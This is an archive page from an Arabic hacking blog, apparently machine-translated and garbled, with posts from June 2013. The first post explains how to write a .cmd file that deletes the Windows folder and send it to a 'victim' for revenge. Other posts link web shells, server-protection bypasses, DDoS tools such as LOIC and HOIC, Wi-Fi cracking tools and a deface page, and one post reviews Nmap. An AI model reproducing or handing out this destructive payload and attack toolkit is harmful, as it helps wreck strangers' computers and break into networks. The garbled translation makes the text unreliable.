اخر المشاركات

الأربعاء، 26 يونيو 2013

كيفية تدمير PC خدعة عدوك التقطيع



فتح المفكرة الخاصة بك واكتب ما يلي ..

ديل ج:؟ \ التمهيد INI C: \ ديل AUTOEXEC.BAT

حفظ الآن كما anyname.exe. خلق هذا في محرك الأقراص C:

الشيء الوحيد الذي تحتاجه هو المفكرة.

1. إنشاء ملف نص يسمى TEST.TXT (فارغة) في C: \

2. الآن في المفكرة الخاصة بك نوع "محو C: \ TEST.TXT" (بدون علامات الاقتباس). ثم حفظه ك "Test.cmd".

3. الآن قم بتشغيل ملف "Test.cmd" انتقل إلى C: \ وسترى هو ذهب TEST.TXT الخاص بك.

الآن، العمل الحقيقي (لا تحاول هذا على جهاز الكمبيوتر الشخصي الخاص بك)

1. الذهاب إلى المفكرة ونوع محو C: \ WINDOWS وحفظه كما findoutaname.cmd.

2. الآن لا تشغيل ملف أو فسوف تفقد الخريطة ويندوز الخاص بك.

لذلك، وهذا الفيروس. وبهذه الطريقة يمكنك جعل الفيروس إلى حذف أي ملف تريد.

الآن إلى الانتقام. نرسل لك ملف إلى الضحية الخاص. مرة واحدة الضحية يفتحه. يتم حذف WINDOWS الخريطة. وقال انه سيتعين على تثبيت ويندوز مرة أخرى.

حذار: بسيطة ولكن فيروس القوية التي تستطيع حذف الموثقة نظام التشغيل ويندوز ...

ملاحظة: أنا لست مع أي مسؤليات إذا كان عن طريق هذا إلى تلف ويندوز الخاص بك.

نأمل كنت تتمتع هذه المادة

الاثنين، 24 يونيو 2013

لتحميل كالي لينكس 

Kali Speech Blog Post 1
تحميل مجاني وكيفية استخدام Nmap عن 6.25



نمب هو أداة معروفة لتدقيق الأمن. أنا اختيار لتقديم هذا البرنامج لأنه يقوم بتثبيت سهل جدا، كما أن لديها واجهة مع الحد الأدنى من الجهد يعطي نتيجة أفضل. ويمكن استخدام وحدة تحكم في Nmap عن أسود مع خطوط خضراء تجعلك تبدو ذكية على الرغم من أنها هي واحدة من أسهل البرامج المتاحة. الآن دعونا نرى ماذا يفعل!

وقد تم تصميم نمب لمسح سريع كبيرة الشبكات، ولهذا أسباب ويشيع استخدام ذلك لتدقيق أمن وجرد الشبكة. معظم الوقت أنا استخدامه على مضيف واحد. لأنها تتيح لي أن أرى ما هي أنواع الخدمات مضيف يستخدم. يمكنك أن تتخيل أنه عندما مسح شبكة واسعة من رائعة جميلة عندما تظهر كل مضيف واحد لكل المعلومات مثل نظام التشغيل الذي يقوم بتشغيل والخدمات وإصدار تلك الخدمة، ما جدار الحماية يستخدم، الخ معرفة هذه الاشياء جدا مهم لأن بعض خدمات القديمة وقد تعرف الثغرات الأمنية والمفرقعات سيئة يمكن أن تضر هذا الجهاز. وهذا مع العلم يمكنك تحديث إلى الإصدار الأحدث والخطر المراسيم الكثير. وهذا ما ينطبق أيضا على إصدار نظام التشغيل ونوع جدار الحماية.

أنا لا أذهب إلى شرح ما المنافذ لأنه إذا كنت تقرأ هذه المشاركة يجب أن نعرف بالفعل هذا. انها الفطرة السليمة المعرفة الإنترنت، مشابهة لمعرفة لماذا السيارات لها عجلات. في رأيي، فإن المعلومات الأكثر إثارة للاهتمام هو حول الموانئ. يتم عرض المنافذ الكشف في جدول. لكل منفذ الكشف يتم سرد رقم المنفذ، والبروتوكول، حالته، واسم تلك الخدمة وصيغته. دعونا نتحدث قليلا عن الدولة. يمكن أن تكون مفتوحة، مغلقة، تمت تصفيتها أو دون تدخل. مفتوحة يعني أن يتم الاستماع للخدمة على ملقم للاتصالات أو الحزم على هذا المنفذ. الموانئ مغلقة لم يكن لديك خدمة التي يستمع. وسائل المصفاة التي على هذا الجهاز وجود جدار حماية أن

  كتل nmap فلم أحصل عليه لا يمكن أن تقرر ما إذا كان يتم فتح منفذ أو مغلقة. نمب يصنف الموانئ ودون تدخل عندما تكون استجابة لتحقيقات Nmap عن، فإنه لا يمكن تحديد ما إذا كانت مفتوحة أو مغلقة. لم يسبق لي أن واجهت هذا في حالة حية حقيقية. عادة يتم فتح الدولة للموانئ أو مغلقة وتصفيتها في بعض الأحيان.

على الموقع جاء فيها أنه يمكن Nmap عن تقديم مزيد من المعلومات عن الأهداف، بما في ذلك أسماء DNS عكسي، تخمينات نظام التشغيل، وأنواع الأجهزة، وعناوين MAC. أود أن أتمكن من استخدامه للعثور على عنوان MAC وعكس DNS هو مفيد حقا بالنسبة لي. عندما يتعلق الأمر التخمينات OS كل ما يمكنني قوله هو أنه جدير بالثقة مثل غجرية أن 'يرى' في العالم. انها ليست مجرد مشكلة Nmap عن. حتى مكلفة البرمجيات فئة المؤسسات لا تستطيع أن تفعل ذلك جيدا جدا.

وحدة التحكم Nmap عن

 هنا هو المكان الذي يحدث كل السحر. لديك قائمة من معلمات الأول فقط اكتب نمب في وحدة التحكم. في الجزء السفلي من المساعدة البسيطة هناك بعض الأمثلة. إذا ظيفة Nmap عن الأساسية هي كافية بالنسبة لك، نوع نمب يليه اسم أو IP للمضيف الذي ترغب في مسحه. كما قلت من قبل يجعل هذا البرنامج الذي تبدو ذكية وحدة مثيرة للاهتمام.

في الواجهة
في الواجهة مفيد إذا كنت جديدا مع nmap فلم أحصل إذا كنت لا تحب وحدة التحكم. يمكنك بسهولة استخدامها لتمرير مختلف المعلمات التي تم تكوينها مسبقا إلى Nmap عن أي أمر دون ان نتذكر. في الواجهة يأتي حقا في مساعدة لنوبي، وأنها توفر في الواقع مجموعة شاملة جدا من الخيارات. واحدة من أفضل الأشياء هو أنه يسلط الضوء على بعض المعلومات في الألوان يمكن ان تقرأ أسهل. إذا كنت لا تحب الواجهة الافتراضية، انتقل إلى الموقع وinsecure.org في المشاريع المتعلقة Nmap عن أيضا بعض ال frontends البديلة وبعض الاشياء باردة أخرى. A الواجهة مختلفة جدا هو Knmap.

أكثر ما يمكن أن تسأل عنه؟! أعتقد في أي شيء آخر وحدة التحكم يمكن عرضها .... ولكن في الواجهة الأمامية من شأنه أن تصل إلى الضعف متوفرة في هذا الإصدار أن يكون لطيف! برامج مكلفة لديه هذه الميزة، ولكن مهلا، Nmap عن مجاني وصغير. أنا أحب برامج جيدة وحرة والصغيرة.

الخير

أنا أحب Nmap عن لأسباب عديدة. أولا وقبل كل ما هو قوي بما يكفي لتلبية احتياجات معظم الناس. فمن السهل لتركيب وسهلة الاستخدام. أود أيضا أنه هو واحد من أصغر البرامج من نوعه (0.6 MB) ويمكن نشرها بسهولة في توزيعات البسيطة. نمب هو واحد من أفضل البرامج لتدقيق الأمن وأنه يمكن أن يكون بالتأكيد نقطة انطلاق جيدة للأشخاص الذين يرغبون في حفر قليلا في الأمن.

والسيئة

أنا حقا لا يمكن التفكير في شيء سيء عن Nmap عن. أنها ليست سيئة. انه لامر جيد، جيد جدا. انها Nmap عن. ربما أنه يفتقر إلى الواجهة بارد جدا لاظهار قيمته.

لجنة تقصي الحقائق

والحقيقة هي أنه في بعض الأحيان يمكن أن تمنع حقا Nmap عن الكوارث، ولكن في معظم الوقت هو مجرد متعة لاستخدام البرمجيات. أعتقد أنك أدركت بالفعل أن هذا هو أيضا واحدة من الأدوات المفضلة من المفرقعات. وآمل أن ندرك أيضا أن من الأفضل للقتال من أجل الجانب الجيد.
اضغط هنا للتحميل

الأحد، 23 يونيو 2013

                               
                                           احدث طريقه لهكر الوايرلس انقر هنا
   

                       
                                                           
                                                     ادوات الاختراق
شلات منوعه
شلات xml للرفع من لوحه تحكم المنتدى
سكربتات الاتصال بالقاعده
ادوات تشفير وفك تشفير Base64
ملفات لتخطي حمايه السيرفر
برنامج فك الهاشات
برنامج النت كات
برنامج لتكوين باسوردات قويه
برنامج فك الزنـد
شرح التنقل بصلاحيه يوزر
برنامج العدسه لكشف الباسوردات المعقده
سكربت تلغيم ملف الفاق
مكتبه لوكالات منوعه
برنامج البيوتي
برنامج التحكم عن بعد
http://www.mediafire.com/?ffzzyngmw0t                  
وقراءه الملفات Forbidden تخطي مشكله
شرج كيفيه رفع الشل من السي بنل وتطبيق اوامر اللينكس
مترجم البيرل
شرح ثغره سكربت المنظم
اوامر اللينكس
سكربت فك الظغط
لستات باسوردات للتخمين
اوامر للرفع على السيرفر
تلغيم لوحه التحكم
شرح طريقه لتخطي الوضع الامن عن طريق خصائص السيبزل
شلات بصيغه asp
مجموعه شلات مشفره


السبت، 22 يونيو 2013

كيفية جعل مجلد غير مرئية في ويندوز؟

إنشاء مجلد غير مرئية
هذا هو فقط للمتعة، وهذه الخدعة سوف لا تبقي المجلدات الخاصة بك سرا وخفية، للحصول على هذه الزيارة
قفل المجلد Windows وحمل مجانا قفل البرامج المجلد

حسنا
لدينا لاستكمال 2 الخطوات التالية لإنشاء مجلد غير مرئية.

1. إنشاء مجلد مع أي اسم

سطح المكتب أو أي محرك أقراص [على سبيل المثال: D: \]> انقر بزر الماوس باستخدام الماوس> جديد> مجلد> عقد البديل مفتاح> نوع 0160> الإصدار بديل الرئيسية> ونحن الآن إنشاء مجلد مع أي اسم.

قد تعمل فقط مع لوحة مفاتيح الأرقام [تقع الجانب الأيمن لوحة المفاتيح] وليس مفاتيح الأرقام على أعلى لوحة المفاتيح.
لا يمكن إنشاء أكثر من واحد NO اسم المجلد في مجلد واحد.

2. إنشاء رمز فارغة

الآن على NO اسم المجلد> انقر بزر الماوس الأيمن> خصائص> اختر علامة التبويب تخصيص> انقر على زر تغيير الرمز [تقع أسفل الجانب]> التمرير على طول ويمكنك ان ترى بعض المساحات الفارغة> اضغط على أي واحد [اضغط على أي مساحة فارغة]> انقر فوق موافق > الزر اضغط زر Apply> انقر على زر موافق

الآن تبدو-أين هو المجلد الخاص بك؟

أننا يمكن أن تبقي لدينا جميع الملفات في هذا المجلد غير مرئية.

تغيير وضع غير مرئية للمرئية

انقر على مفتاح Ctrl + A-الآن جميع المجلدات يتم تحديد، يمكنك مشاهدة مجلد السري الخاص بك هنا


الأربعاء، 19 يونيو 2013

طريقه فتح الشبكات المخفيه




الجمعة، 14 يونيو 2013




تم عمل السيرفر على نسخة المايكروتك الاخيرة
Mikrotik V5.18 Level 6
ومن الواضح انها مرخصة مئة بالمئة
وهذه النسخة الاسرع والافضل

ثانيا
واهم شيء بالسيرفر
انه شغال على

Microsoft Virtual PC

وهذا بحد ذاته انجاز وشيء نادر
وان شاء الله بأقرب فرصة
السيرفر الخالي من الاعدادات لهذه النسخة
بعد التقييم طبعا

ثالثا
تم وضع الكثير من سيرفرات
PPPOE
بداخله

رابعا
اسم الانتر فيس تم تغييره
الى اسم آخر
مع اضافة سكربت التخلص من حماية
الايرث لنك الجديدة اللي تخص

حظر السيرفرات الوهمية

وهذه صورة للسيرفر من الداخل
وتم ارفاقها ايضا بالمرفقات بالنسبة
للذين ليس لديهم عضوية بالايماج شوك
حتى الكل يشوفها

الأربعاء، 12 يونيو 2013

                                                                  اختراق الشبكات 2013

1-Microsoft Virtual PC
2-can
3-winbox
4-mikrotik-2.9.27_FULL_Level6

كيفيه هكر الواير لس اول شي تحتاج برنامج Beini.rar
ثاني شي تحتاج برنامج VMware Workstation عملاق الانضمه الوهميه 
برنامج Beini يحتاج تنصيبه على النضام الوهمي رابط تحميل البرنامج من الموقع الرسمي https://www.wuala.com/zarabyte/APPZ/
ادوات الهجوم على المواقع
anonymous pakage attack:
http://www.mediafire.com/download/b28...
hoic:
http://www.mediafire.com/download/4on...
loic:
http://www.mediafire.com/download/cuy...
contact me on
fb.com/semeh.ameur22
only hackers group:
https://www.facebook.com/groups/46188...
fb pages:
https://www.facebook.com/pages/%D9%85...
البحث عن وجود إشارات لشبكات وايرلس

قبل الدخول إلى أي شبكة وايرليس يجب أن تقوم بمسح الإشارات المجاورة لك أو بما يسمى بالبحث عن وجود أي إشارات لشبكة لاسلكية مجاورة لك علة حدود نطاقك فمثلاً إذا كان أقصى مدى مسموح لشبكة وايرلس هو 5 ميل فلن تستطيع أن تحصل على إشارة على بعد 6 ميل.

إذن يجب أن يكون الحاسب الخاص بك موجود في منطقة تسمح بوجود إشارات لشبكات لاسلكية.

إذا كنت تتسائل هل يجوز لأي حاسب آلي أن يتصل بشبكة لاسلكية؟
فالإجابة هي نعم إذا كان هذا الحاسب متصل به كرت شبكة لاسلكي

نعود إلى موضوعنا الرئيسي و هو عن كيفية البحث عن وجود إشارة..


البرنامج الأول






يتميز هذا البرنامج بأنه يعمل على بيئة الويندوز و ليس اللينكس مثل أغلب البرامج المشابهة كما أنه سهل و بسيط الإستخدام للبحث عن إشارات شبكات وايرليس.

ملحوظة هامة لن يقوم البرنامج بالطبع بالبحث عن أي إشارات إذا كنت لا تملك كرت شبكة لاسلكي.

بعد تثبيت البرنامج و تشغيله سيقوم بالبحث أتوماتيكياً عن وجود أي شبكات محيطة بجوارك و إذا لم يعم يقم بالبحث تلقائياً قم بالضغط على الزر السهم الأخضر الموجود في شريط الأدوات و انتظر حتى ينتهي البحث و يسفر لك عن وجود الشبكات التي يمكنك الإتصال بها.

اندوكس جاهز



للتحميل   http://www.gulfup.com/?48GsnA